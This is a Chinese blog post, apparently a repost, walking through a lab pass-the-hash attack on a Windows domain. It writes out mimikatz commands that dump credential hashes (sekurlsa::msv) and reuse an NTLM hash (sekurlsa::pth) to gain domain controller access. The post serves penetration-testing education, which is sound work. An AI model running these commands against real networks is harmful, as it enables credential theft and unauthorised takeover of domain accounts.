【知识整理】域渗透之Hash传递(Pass The Hash)

admin 2023年11月5日21:35:58评论26 views字数 796阅读2分39秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

Windows域是计算机网络的一种形式,其中所有用户账户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。身份验证在域控制器上进行。在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。从Windows Server 2003开始 , Active Directory是负责维护该中央数据库的Windows组件。Windows域的概念与工作组的概念形成对比,在该工作组中,每台计算机都维护自己的安全主体数据库。
Hash传递(Pass The Hash)攻击,该方法通过找到与帐户相关的密码散列值来进行攻击。

文章参考:
【搭建合集】Windows域环境搭建

0X02 实验环境
Windows Server 2012DC):
    192.168.80.135

Windows 7:
    192.168.80.131
    mimikatz 2.2.0

0X03 实验开始

无域控权限

【知识整理】域渗透之Hash传递(Pass The Hash)

运行mimikatz(需管理员权限,实验环境为了方便省去了提权操作)

【知识整理】域渗透之Hash传递(Pass The Hash)

privilege::debug\提升权限log\日志

【知识整理】域渗透之Hash传递(Pass The Hash)

如果执行privilege::debug报错,可能是权限问题

【知识整理】域渗透之Hash传递(Pass The Hash)

sekurlsa::msv//获取信息

【知识整理】域渗透之Hash传递(Pass The Hash)

sekurlsa::pth /user:Administrator(Username) /domain:test(Domain) /ntlm:e1bd9dcbc5f2e08a21e23f3c890aaff7(NTLM)执行后会弹出一个CMD窗口
【知识整理】域渗透之Hash传递(Pass The Hash)

新窗口获取域控权限

【知识整理】域渗透之Hash传递(Pass The Hash)

0X04 写在最后

回复“加群”,获取群号。

侵删!

原文始发于微信公众号(皓月的笔记本):【知识整理】域渗透之Hash传递(Pass The Hash)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月5日21:35:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【知识整理】域渗透之Hash传递(Pass The Hash)https://cn-sec.com/archives/2177631.html

发表评论

匿名网友 填写信息